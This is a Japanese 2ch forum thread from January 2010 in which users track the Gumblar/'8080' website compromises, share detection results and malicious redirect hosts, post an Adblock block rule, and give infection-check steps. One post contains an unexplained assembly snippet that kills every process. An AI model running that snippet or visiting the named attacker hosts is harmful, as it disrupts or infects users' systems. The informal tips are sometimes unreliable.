　ノートン警察は、シマンテックと共同で昨年9月17日〜12月9日に行った広告キャンペーン。
中川翔子さんの大切なもの「ギザ」をサイバー犯罪グループから守るというストーリー形式で、
ウイルスやトロイの木馬などについても学ぶ内容だったという。

>>523
whois見てそこへ報告すた。
届けばいいけど。。。

Adblockのブロックリストに
|http://*.ru:8080/*
で今のところは大丈夫かな

>>526
aguseで調べたけど出なかったKasperskyなのに
画像取得日時　2010-01-08 02:53:28
検出されたウイルス（ワーム、スパイウエア）
ウイルス（ワーム、スパイウエア）は検出されませんでした。

ドクター中松のサイトもやられてる

>>551
/*GNU GPL*/ だぎゃ。。。

>>551
GNU GPLだね

しかし凄いことになってるな

>>551
ほい、飛び先.ru:8080/pics/win.jpg
ttp://online.us.drweb.com/cache/?i=2c2639efd0815cc02072f39ffcf95712

インターネットからftpでメンテできるwebサイトが多すぎなのが悪いんだろ？
うちは、インターネット側からは、VPN経由でしかログインできないようにしてるから、
HP制作会社にはVPNクライアントいれてもらってる
仮にFTPアカウントが漏れてもVPNの認証を突破しない限り書き換え不可

avast!のWebシールドでも反応しない新ガンブラーが登場
http://tsushima.2ch.net/test/read.cgi/news/1262886266/

今まで/*GNU GPL*/だったサイトも/*LGPL*/に変わったりするのかな？

Webシールドに頼って定義ファイルが手薄だったavastには不吉な予感

RequestPolicyでブロックしたがthelaceweb●ruだな。

>>523
スクリプト以外は今までと同じっぽいから
スクリプトだけで対応してたアンチウイルスは以外は大丈夫みたいだね

>>541,543
漏れも別の感染のサイトで「/*GNU GPL*/ 」が「/*LGPL*/」に変わったのを確認したお。。。
他もそーなるんだろか…

ドクター中松のサイトが/*LGPL*/になった・・・

>>562
あちゃー

しかも呼び込み先変えてるっぽい…

yahooやらgooやらがやられない事を祈るだけだな・・・

>>562
もともと/*LGPL*/じゃなかったの？
俺は初めに見た時から/*LGPL*/だったよ？
カスペは全く反応しなかったよ
新種なの？

>>566
「/*GNU GPL*/」
ttp://megalodon.jp/2010-0108-0303-45/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fdr%2Enakamats%2Ecom%2F
「/*LGPL*/」
ttp://megalodon.jp/2010-0108-0426-38/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fdr.nakamats.com%2F

>>566
http://www.virustotal.com/jp/analisis/6fa28b2165d271842128a6936c19935674b51ad249d0da8aff224779eeee6bb6-1262894686
どこも検出しない

>>566
>>551-553
自分も確認したけどね
メモに控えてある感染サイトも時間ごとに/*LGPL*/に置き換わってる
あきらかに新型スクリプトだな
確認してないがウイルス本体も新型かもな

>>569
一応>>567の下にはいつものはあったお
ttp://online.us.drweb.com/cache/?i=59056904c3c444d85f8c5779dfff2c11

検出逃れのために数時間の間に書き換えが行われているってこと？

>>571
えぐざくとりぃ
多分…

春先のGENO騒動（同人祭り）に比べてスレ伸びが鈍いのが気になる…大手企業も続々やられてるというのに。
adobe系更新でokだからか？
一般ユーザには実害が無いからか？
春先はちょうど時期的に豚インフルと重なって盛り上がっただけなのか？
この手の騒動に飽きたのか？

それじゃソフト入れて対策コピペの奴全部実行して対処しても意味ねーじゃん（'A`）

>>573
> 同人祭り
学習したんじゃないかな。。。

>>574
頻繁に更新があるウイルスもあったのでにゃー

>>573
GENOは起動不可だったり動作が重たかったりで気がつかれる失敗作だから
今回はちゃんと動くバージョンに進化したた言うべきなのか、いやな進化だ
ちょっと重いとかネットワークハブのランプが常にチカチカとか普通の人は気がつかないから怖い

>>576
にゃるほど。
初期のものはそーだったのか。

>>573
・2ちゃんねるの規制・スレ分割・8080とGumblarと区別できなくて情報が錯綜・感染したか実感がない
などなど考えられることは多数。ってかスレの勢いが盛り上がりの指標とは限らない
正直、感染しましたってだけのレスだけで加速してるのならこれぐらいの勢いで、有用な情報のみ書き込まれる方が良い
>>574
発覚してない脆弱性を使ったゼロデイが使われない限り、今までの対策で問題なし

>>576
Gumblarとはまた別物なんだから進化したって訳じゃないだろ。今までのものより厄介な新種が出てきたって言った方が正しくね？
ちなみに初代Gumblarも復活の兆しありとか

>>573
前回時にAdobe系のアンスコやアップデートやAcrobat JS切る等の対策は周知されてたわけだから
今回騒いでるのって前回対策取らなかった人達だけだからじゃね

>>579
そうだな、8080系と言っておかないと混同してしまうな
ウイルス製作者同士のプライド合戦とか勘弁してほしいよ

>>578
水面下で拡大して後々めんどくさい事になるのが怖いんだが…。

結局、8080系に引っかかった奴らって>>580が答えなの？
あんだけ騒がれてたのにアップデートもしてなかったの？

同人系でも古参が多かったり旬で活発なジャンルは今でもGENOの注意書き残してるとこ多いからなぁ
若い子が多いジャンルや活動が活発じゃないジャンルは放置しっ放しだが

コメント行が書き換えられただけで検出できないって・・
どこのセキュソフトも本格的な対策は取ってないってこと？

>>581
まあGumblarと8080系の作った作者orグループが同一人物orグループでないとも言い切れないんじゃないのかな？ｗ
そこら辺どうなってんのかはよく知らんけど、感染経路は似ていても別物であることは確か
>>585
何を以て本格的な対策と言うのか？そりゃスクリプトの時点で検知できなくても、その先で検知する場合もあるだろうし、しないかもしれない
ユーザーができる本格的な対策と言えば、脆弱性のあるソフトのアップデートとReaderのjs切るってこと
そしてウイルス対策ソフトで検知できるから安心だ！とか絶対に思わないこと

>>585
いや、Gumblar.xの時はもっとひどくて取得ごとにスクリプトが違ってたから
誤検出を考えると対応が難しいんだと思う
ほぼ確実な検出ができたのはカスペくらいだったはず

今のところついてってるのはNOD32だけだね
ユーザーの対策が出来ていても、htmlに埋め込まれたドロッﾊﾟｰは取り込んでしまうからね。
それに、この調子だとユーザー側の対策なんて、気休め程度になってしまうかもしれない。
JAVAもフラッシュも使えないネットなんて
経済的損失が計り知れなくなるだろう。

業者起きたのか。釣り針でけえな

NOD32（笑）

JAVAとJAVAScriptの区別は必要だな

おおっNOD32一番乗りか？と思いきや別のサイトのスクリプトでは・・・
偶然引っかかっただけだな

結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262897785
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262897301
結果: 0/41
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262897643

85 名前： 滑車(東日本)[sage] 投稿日：2010/01/08(金) 05:33:19.37 ID:ERkw5/xM
今>>1のソースをvirustotalにおくったらNOD32だけが反応した
http://tsushima.2ch.net/test/read.cgi/news/1262886266/85-87

>>589
>>588はこのことだね。
http://tsushima.2ch.net/test/read.cgi/news/1262886266/85-87n

>>593　それ書いたのは僕なんですがAvast!信者です。

さて、変わったのはコメント行だけかな？
どうやって指令してるのかな？

犬HKラジオでもトップニュース扱いだな。

受付のスクリプトに反応するかしないかの問題であって、他のベンダーが絶対検知できないって訳じゃないでしょ
要はどの段階で検知するかの問題
後virustotalでの結果と実製品で違いでる場合がある。ヒューリスティックの違いなのか、HIPSとかとの兼ね合いなのか詳しい事は俺は知らん

でも1つだけ言えることは、このスレはどこのベンダーが良い・悪いとか議論するとこじゃないと思うけど？
製品比較やりたいなら、適当な別スレでどうぞ

自分はあくまで検証目的で貼っただけなんだが・・・
気を悪くしたなら少し控えるか
定義データに左右されないらしいノートンの侵入検知の例もあるしな

>>598
いやいや、検証目的としてはぜんぜんおｋだし>>592のレス内容を叩いてる訳じゃない。これからもどうぞ続けて下さいｗ
俺が言いたかったのはただ単に特定のベンダーが良い・悪いとかここですんなよってだけです
紛らわしいタイミングになってｻｰｾﾝ

>>599
おｋ
ではこれからも節度を持った上で貼らせてもらおう

なんだかすげえ馬鹿スレになってきたな

>>522
ノートンは確信犯だってば
芸能アバターのせい

良い悪いすんなっても気になるのが人情だろ。
人間見ないでルールだけ見る奴って何なの？

avast以外大丈夫だよ

そもそも、インターネットからFTPで更新できるってのがもういまの時代はダメダメだろ
特定のIPアドレスに制限するとか、VPN必須にするとかしないと

>>604
なにが？avast!以外大丈夫なのかな？

これ明らかに世界中のインターネット絶滅推進派が仕組んだテロだろ

まずいなあ、ウイルス本体も新型みたいだぞ

結果: 0/40
ttp://www.virustotal.com/jp/analisis/9c063a80b9be621983142f51b500161003ca8e6b8ce7e3127c249fb1e34b184c-1262904786
avast!Anti-Virus Part120
http://pc11.2ch.net/test/read.cgi/sec/1261930389/448

こういうネズミ算式に増えていく無差別で大規模な改竄は今まで何度かあったけど、
今回はAdobeが脆弱性を12日(日本時間13日)まで放置してるのが痛すぎる。

>>609
年末年始休暇を狙った組織的犯行の模様
サイト運営者もアップデート担当の開発者も休みだろうしな

>>608
（'A`)

結局どうすりゃいいのよ、誰もわかんないのかよ

lanケーブルをハサミでチョキンとやれば確実に防げるぞ

FTPの情報どうやって抜いてんの？
FFFTPのレジストリに生で記録されてんのか？
iniに出力するようにしてるんだが、どうだろうか

会社で借りてるサーバにうちの馬鹿が感染させたんだが、
上に言っても、パスワードは変えられないの一点張り、脳みそがイカれてる

書き換えられるたびにコード削除していくの疲れたよ

FTP通信したときのパケットそのものを見てると思う
FTPソフト側での回避は無理

>>615
乙
感染したのは8080？
書き換えられる頻度はどのくらい？

>>615
それはありえんｗ

>>615
乙
アホだなー

>>615
なんで変えられないんだろう？
感染をもみ消したいのかな？

更に大きな感染呼び込んで信用失うだけだと思うが。

http://www.zenoah.coアッー！jp/

実験台で見たらコードがなかった・・・

>>617
まだ3回くらいだけどね
IDパスばれてるんだから今後もやられるとしたらキツいんだ

今は/*LGPL*/から始まって8!@0@^8)@0？/とか書いてあるから8080だろう
前は/*GNU GPL*/だったな

一部/*GNU GPL*/〜のまま放っておいたものが/*LGPL*/〜に置き換わってた
追記じゃないみたいだね

>>620
全ファイル消去されたら考えも変わるかもね
俺は元データ持ってないから落してエディタで書き換えて再アップ
スクリプト書いて消そうかと思ったけどミスって全消去したら・・・怖いな

>>622
なんなのその原始時代みたいな会社ｗ

他人の不幸で飯が旨い

どうせ感染したというアナウンスもしてないんだろ

てういか今後も感染するから出せないかｗ

>>623
実際、原始時代みたいな会社だよ
いくら言っても「スキャンしとけよ、ファイル書き換えておけ」と言われるだけ
セキュリティに何の関心もない様子
去年のGENOもしっかり掛かってたしな、そのときもパス変えてくれって言ったけど今に至る

>>626
そういうバカ会社は一回痛い目を見ないと変わらないから
全消去になったほうがいいかもね。

いくら言っても聞かなかったくせに、いざその事態になると泣きつくんだよな。
ほんと氏ねよと思うわｗ

>>626
会社としてやばい
すぐに転職を勧める

http://up3.viploader.net/ippan/src/vlippan054095.png

一部の記号を消したらこうなった

誰か検体上げてくれ

なんでサーバーの管理者がWindowsなんか使ってるんだ？
普通は違うOSを使うと思うんだけどな

>>631
Webデザイナのマシンに感染したとか

ずっと鯖OSさわってるのは鯖屋であって
鯖管とは違くないか

Telnetあるし

http://up3.viploader.net/pc/src/vlpc001718.png

hundekuru

ソースチェッカーオンラインみたいなサイトないの？
怖くて未知のURLは踏めん・・・

Telnetってｗｗ
いつの時代だよｗｗｗ

仮想でAVAST止めて行ったら仮想じゃない方攻撃されてノートン先生に止められたｗｗｗｗｗｗｗ

顧客情報にアクセスできるショッピングサイトの管理者はすぐに対応しろ

>>625
ttp://www.aguse.jp/

>>637
そのゲストOS・・・プロダクトキー入れてる？
盗まれるぞ・・・

>>281
それってなんでWindows標準FWだと防げないの
既知のアプリの未知のポートだと無理だけど
未知のアプリが通信しようとすればポップアップがあるのは変わらないはずだけど

>>641
WindowsファイアウォールAPIってのがあってだな・・・
例外追加等々

>>642
MSDNに該当する記事有り
Windows Firewall and Windows Firewall with Advanced Security (Windows)
ttp://msdn.microsoft.com/en-us/library/aa366453(VS.85).aspx

>>640
このゲストOS・・・プロダクトキー入れてる
盗まアッれるの・・・

>>642
なにそれ
だめじゃん

そもそも、Windowsを管理者権限で常に使用してるようなやつが
Firewallとかセキュリティーとかの各種設定をトロイに変更されたりするんだろ

通常使用は一般ユーザーで使用すればいいのに
7/Vistaなら、ログインしなおさなくても管理者権限が必要なときは管理者パスワードのダイヤログボックスが開いて
すぐ管理者作業できるから、常に一般ユーザーでログイン知れればいい

>>644
マイクロソフトで使用期限3ヶ月くらいの体験版の仮想マシンVPC配ってるから、
その仮想マシン使えばいい

一般ユーザーですら管理者権限
流石Microsoft

>>647
大丈夫がと思うよ
なにかあったときにはAVASTとノートン先生が守ってくれるからｂ

>>648
なアッー！っなアッー！んだアッー！ってええええええええええええええええええええええええええええええええええええええええ

>>647
アッー！と、一回M$のXPModeで、ひどい目にアッー！っアッー！から使いたくない

◆sage/xLnlI、アウト〜

>>646
明示的に表示されてないとfirewallスルーできないよね
できないといって><

>>652
なアッー！んで？

結論「ユーザーの意識改革が必要」

少々知識が足りなかったようだな

Firefoxがクラッシュしまアッー！した

NGNameに追加 sage </b>◆sage/xLnlI <b>

話は全部聞かせて貰ったぞ！（ガラッ
sage ◆sage/xLnlIのプロダクトキーは既に流出している

>>659
えっ


どうゆうこと？

既に感染しているかどうかを調べる方法がないことだけは分かった

>>661
うｎ


windows7の感染確認方法知ってす人いないよね？・？

>>646

そもそもXPの時点では、まともにユーザーモードで動かないソフトが多すぎて...

ずっとこんなイタチゴッコ続けるのかよ。
感染したらUbuntuにする。少なくとも嫁のPCは。

もそもそ

>>664
上流のdebianにしろｋｓｇ

むしろ感染してしまえば楽になるような気がする
俺は遠慮するけど

とりあえず現状、普通のクライアントPCが感染してるかどうかの判断ってどうやってんの？
春のGENO祭りの時にはレジストリ内におかしなファイルが有るか無いかで判断してたが

ウイルスの検体マダー！？

>>663
自分もそれが困る
たいしたソフトじゃないのになんで管理者権限じゃなきゃいけないんだろう

>>669
>>76

プロダクトキーを入力せずにインスコ→被害者向けの特価で正規のプロダクトキー購入→ウマー
これがMicrosoftクオリティーなのか・・・

>>668
ウソの情報が飛び交ってるだけで、アンチウイルスソフト作ってる会社でも分からない

>>673
嘘の情報ってｗｗ
検体があればリバースエンジニアリングで動作くらい分かるだろJK

>>663
つ 別のユーザとして実行

これで動かないソフトのほとんどは動く。

あっちこっちで呼び方が違うからもう何がなんだか分からない

>>664
誰も使ってないようなOSにすればウイルスのターゲットにならないから、
できるだけマイナーなのにしとけ

NetBSDとかOpenBSDとか

普通のクライアントPCは感染してるかどうか確認する方法ないの？
マジで？

全台クリーンインストールしろと言うのか

>>678
新種のマルウェアに強いウイスルソフト使ってスキャンすればいいだろ
100%ではないが、だいたい確認できる

section .note.netbsd.ident
dd 0x07,0x04,0x01
db "NetBSD",0x00,0x00
dd 200000000


section .data

section .text
global _start

_start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37
push eax
int 0x80

>>648
マニュアル読め。
スタートアップガイドで普段は制限ユーザで使うようにと書いてあるわ。

AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。

>>681
誰でも簡単に権限昇格できるWindowsなんて（ｒｙ

>>675

大量にあったら、そんなめんどーなことは誰もやってくれないつぅこと
各アプリケーションもほとんどまともに対応してくれなかったしねぇ〜

Vistaが出てやっと対応したところのが多いじゃん

【ネット】洋菓子「モロゾフ」のサイト、何者かが改ざん　閲覧すると新型ウイルス「ガンブラー」に感染する恐れがあったが、被害報告なし
1 ：おっおにぎりがほしいんだなφ ★：2010/01/06(水) 07:20:34 ID:???0
洋菓子メーカー「モロゾフ」（本社・神戸市）のインターネットサイトが
何者かに改ざんされる被害に遭っていたことが５日、わかった。

同社によるとサイトを閲覧したパソコンが新型コンピューターウイルス
「ガンブラー」に感染する恐れがあったが、被害の報告はなく、
サイトは改善済みという。

同社の説明では、改ざんされたのは４日午後７時半〜５日正午で、
感染や情報漏えいなどの連絡はない、としている。



↑
こういう「被害の報告は無く」ってのが一番怖いと思うんだが…
閲覧ユーザは感染に気づかず、ボット化してる可能性もあるって事だろ？

>>682
だからそのときのために、わざわざMSがIEに保護モードつけたりしてくれてるんだろ
ちゃんと保護モードに対応したIEプラグイン類なら、プラグインに脆弱性があってマルウェアにやられても、
やられる範囲を制限できる

【今株馬鹿】GENOウイルスのお陰でウイルス対策会社の株が急騰
http://tsushima.2ch.net/test/read.cgi/news/1262929220/

保護モードなんてバイパス出来るだろｗｗ

>>686
IEの保護モード機能ってサイト閲覧時のファイル保存先を限定してるだけじゃないの？
Adobeの脆弱性を突いた攻撃と何の関係があるの？

感染しているかどうかを調べる
今一番有力な方法を教えてくださひ。

>>685
お前らモロゾフのHP見てみろｗ
http://mimizun.com/log/2ch/news4vip/1262612925/

1 ：以下、名無しにかわりましてVIPがお送りします：2010/01/04(月) 22:48:45.86 ID:kMgcW7bI0
ttp://www.morozoff.co.jp/

なんだこれｗ


5 ：以下、名無しにかわりましてVIPがお送りします：2010/01/04(月) 22:53:02.74 ID:+8J8P32m0
Javaのコンソールが起動してPCがすげー重くなった
なんか仕込まれてるの？


7 ：以下、名無しにかわりましてVIPがお送りします：2010/01/04(月) 23:00:03.62 ID:euSlf2pA0
>>1
死ね

重いいいいいいいいいい

webサイト作ったらわかるんじゃね？
改ざんされたら感染してる

VPCでモロゾフを踏んでみた。
processmoniterでその時の挙動を調べてみたが、何も起こらない・・・

保護モードって、IEのプロセスを通常よりさらに限定された権限で
動作させることに一番の意味があるんだよ

保護モード非対応のプラグイン類を動作させるときはデフォルトで警告が出るし、
警告がでない保護モード対応プラグインなら、脆弱性でやられてもまず影響が出ない

保護モード下で動いてるIEやプラグインに脆弱性があってやられても、
システムのほとんどの場所に書き込めない

このあたり呼んでみれば？
http://msdn.microsoft.com/ja-jp/library/bb250462(VS.85).aspx

>>692
適当なHTML作って、FTPでどこか上げたときに
書き換わってるかをチェックする感じでしょうか？
社員のPCをチェックしたいんですがなにかいい
方法はないかなァと思いまして。。。

保護モードバイパス美味しいです＾＾
CodeProject: A Developer's Survival Guide to IE Protected Mode. Free source code and programming help
ttp://www.codeproject.com/KB/vista-security/PMSurvivalGuide.aspx

>>693
そりゃあ、今踏んだって何も起こらなくて当然。

>>694を素直に読むと、IEの保護モード有効下だとAdobe脆弱性回避できるように思えるけど実際は違うよな？

他サイトに飛ぶときに警告を出せば済む話だろう
２ちゃんを見習え

>>694

>>99
99 ：名無しさん＠お腹いっぱい。：2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた（←阿呆）
/*GNU GPL*/〜というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか？というウインドウが出てきて（VISTA）
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
（以下略）



これってつまり、IE保護モードで今回のリスクは回避されないんじゃね？

保護モードは一部回避可能だけど、
Flashの脆弱性を狙うコードが保護モード回避したとかの話は聞いたこと無い
テストコードは出ても、実際にそれを使ったマルウェア等は出てない

感染実験したいからURLくれ

>>696
そこ見ても、保護モードのシステムの管理下で動作するだけで、
勝手にシステムとかに書き込めるわけじゃないじゃん

>>694
>Adobe Readerの脆弱性攻撃は、「ChangeLog.pdf」というPDFファイルの中に
>複数の攻撃コードが組み込まれており、パソコンにAdobe Readerがインストールされている場合には、
>この細工されたPDFファイルを自動的に開いて攻撃を行う。


↑保護モードでは通過してしまうプロセスを悪用してるんじゃないのかと

＞＞脆弱性でやられてもまず影響が出ない
そういえばJavaがウイルスのローダーとして悪用されていた件
脆弱性以前の問題だよね・・・

もうどんな防御しようと無意味なんじゃないかって思えてきた

OSなりブラウザを仮想化すれば良いではないか

そういう手段しか思いつかないレベルってことですね

>>706-708
NO

Adobeがちゃんと脆弱性塞いでれば良いだけの話
もっと言えばMSが情報公開して協力してれば良いだけの話
攻撃自体は単純

警視庁も動きだしたそうじゃないか
どこまでできるのかわからんけど

>>709
>MSが情報公開して協力
誰に？

>>711
Adobeに

JavaもReaderもアンインストール
WindowsとFlashは最新
ばっちこいや

>>713
最終ステップ：Windowsもアンインストール

Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt

WIN7は感染しないんですか？

ゲームやケータイのブラウザが最強だな
感染する場所がありゃしないぜ！

もうみんなでマカーになろうよ

つlinux

凄い初心者な質問で申し訳ないけど
普段から使ってるもの一通り最新版にしておけばGumblarに限らず
大体のウイルスにかからないもんなの？

さきほどGENOウィルスが仕込まれてる可能性の高いURLを踏んでしまいました。
慌てて途中でブラウザを閉じたのですが感染してるか心配です。
こちらの（http://www29.atwiki.jp/geno/）GENOウイルスまとめサイトに書かれていた方法を確認し
感染の可能性は低いと判断しましたが、このサイトの情報は古いと書いてあったので
本当に無事なのかちょっと心配です。
上記サイトに書かれている方法以外に感染を判断する方法はありますか？

>>720
古いバージョンの脆弱性を狙うタイプのウイルスは防げるかと思われ

それ以外にも例えばAdobeReaderのjsOFFみたいな機能設定に関する脆弱性とか、
そもそも実行型ファイルを開いて感染する場合もあると思うけども

>>720
一通り最新版にして適切な設定にしていれば助かる可能性は高くなる
なんでもかんでも自動実行されるPCだとGumblarに限らず危険って事

>>709
Adobeの対応悪すぎだよな。
過去のMicrosoftと同じ過ちを繰り返してる。
みんな歴史に学べないねぇ。

>>720
新型はふせげねー、新型にあたったらクリーンインストールするしかない

やっとAdobeの修正がきたみたいだね
ttp://internet.watch.impress.co.jp/docs/news/20100108_341267.html

来週の話でしょ。
対応遅すぎ。

なんでそんな悠長に構えてんだろうなアドビ
自分とこの製品が犯罪に利用されてるってのに

AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。

競合相手がいないからさ

>>720
感染しているPCはCPU使用率が異常に高いのも目安のひとつだな

サイト改ざんリスト（発表分のみ）
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113

三栄コーポレーション
サイバーエージェント
ハウス食品
東京財団
データリンクス
京王電鉄
ビロング
恵那バッテリー電装
ナショナルクリエイターズカンファレンス
大学図書館問題研究会
モロゾフ
民主党東京都総支部連合会
ローソン
検索エンジンMooter
デジタルマガジン
ディズニー
信越放送
FX為替情報検索「fxwill.com」
野村ビルマネジメント
京成トラベルサービス
本田技研工業
JR東日本
ラジオ関西


しかし、とんでもねー数だな…

adobeもアレだけど感染した企業のセキュリティに対する認識の甘さも問題だな

猛威をふるうガンブラーの徹底対策術
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm?from=navlk

/*LGPL*/
http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262939972
対応済み：Avira　カスペ　NOD32

CVE-2009-4324

VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html

extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324

>>732
ここらのサイトやアメブロなんかで気づかずに感染してる一般人って相当数いるんじゃね？
今回のは自分が感染してるかどうか分からないみたいだし…

>>732
ネズミーもか！？
閲覧者多そうだしますますやばいな

>>721
一応他スレから転載

437 ：8080：2010/01/08(金) 18:03:07 ID:Db0zlWvOO
>>435
旧Gumblarのやつは使えない。


【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除


＊感染していた場合＊
駆除するより、バックアップを取ってから
リカバリ(クリーンインストール)を強く推奨。

>>732
ディズニー見ちゃったよ
いつの時点で改ざんされてたんだろう

>>737-738
リンク先読めばわかるけど、大体の企業は
「特定のページがやられてて、それ以外は今のところ異常ない」って建前らしい。

まあ、ウイルスの全貌が解析されきってない以上
実際のところはどうだかわかったもんじゃないけどね。

>>740
リンク先に詳しく書いてある。

>>742
Forbiddenってなる

>>732

＞■検索エンジンMooter（2009年12月30日発表）
＞種別：/*GNU GPL*/
＞期間：2009年12月25日1時〜12月28日18時30分
＞場所：Mooterホームページ（*.mooter.co.jp）、および「Mooter検索窓」の設置サイト
＞告知：弊社ホームページの改ざんについてのお詫びとお知らせ（削除済み）

こことか地味に酷くね？
検索窓設置してるサイトもやられてるとしたら、どこまで広がってるか…
しかも告知「削除済み」とか対応がありえねえだろ。

>>743
は？

■ディズニー（2009年12月29日発表）
種別：Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所：ショッピングサイト お正月特集ページ（www.disney.co.jp/shopping/special/0912_newyear.html）
告知：お正月特集ページに関するお詫び
http://www.disney.co.jp/shopping/pop/091229_info.html

しょうがないやつだ。念のためおまえのPCはクリーンインストールして来い

>>743

＞■ディズニー（2009年12月29日発表）
＞種別：Gumblar.x
＞期間2009年12月22日16時〜12月25日18時
＞場所：ショッピングサイト お正月特集ページ（www.disney.co.jp●shopping/special/0912_newyear.html）
＞告知：お正月特集ページに関するお詫び
＞www.disney.co.jp●shopping/pop/091229_info.html

>>743
■ディズニー（2009年12月29日発表）
種別：Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所：ショッピングサイト お正月特集ページ（www.disney.co.jp/shopping/special/0912_newyear.html）
告知：お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html

>>735
>>592 を再スキャンしてみた
定義データでは一部のスクリプトだけの検出だな・・・
本格的な対応はこれからか

結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262941360
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262941441
結果: 1/41 (Sophos)
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262941513

でもまぁ、
(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

の対策が取れてたら感染サイト踏んでたとしても大丈夫なはずだが一応

>>746-748
わざわざすいません
該当する期間とショッピングサイトには行っていないから
なんとかセフセフ

New谷さん大丈夫かね

748 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/08(金) 18:18:27
>>743
■ディズニー（2009年12月29日発表）
種別：Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所：ショッピングサイト お正月特集ページ（www.disney.co.jp/shopping/special/0912_newyear.html）
告知：お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html

>>750
http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO（Gumblar）ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す

もともとスクリプトを検出していたのは少ない
win.jpgなどの脆弱性を突いた攻撃自体を検出した方が効率的だろ
脆弱性攻撃を受けた後実行されるpdfupf.exeだけを検出すものもあるがこれでも防御は可能

>>739の感染確認方法ってどうなの？

現時点じゃ他に確認のしようがない

「New谷さん」呼びはやめろよな

>>755
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
の部分は新しいやつで
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
に変わってる
しかし同じような名前なのですぐ気づく
これからも変わるかも知れないが変な物が登録されているかはすぐ分かるだろう

>>758
詳しくありがとうございます

ごめん誤爆だった

このあいだfirefox NoScript＋view-source:で
感染サイトのソース見ようとしたらavast!がプゥプゥいった。
この状況でも感染するもの？
adobeのjavaはオフにしてある。

糸色望した

>>761
その場合はNoScriptでブロックされているはず
問題ない

＞adobeのjavaはオフにしてある。
Tips:JavaとJavaScriptは別物

view-sourceだけでも安全な気がしてたんだが・・・
違うのね

安全だよ

txtとして開くんだから大丈夫じゃないの？

txt形式でもウイルスのコード記述があれば反応するのでは
感染はしないけど

>>763ありがとう
ていうかview-source:ってリンク先のサイト踏まずに
ソースがみれるものだと思ってたんだがウイルスは防げないのか…
オンラインソースチェッカー閉鎖が惜しまれる

オンラインソースチェッカーの代わりに
http://www.aguse.jp/
じゃだめなのか？

>>768
見れると思うけど
>>550
ttp://www.aguse.jp/

初心者で申し訳ないんだけど、>>753の（1）〜（4）に加えて
IEでセキュリティ高にしたり、firefox＋NoScript使えばさらに安全になるのかな？

>>710
モロゾフの人がＦＴＰログを証拠として被害届けを出したそうですね
でもあれは不正アクセスの証明にしかなりませんね

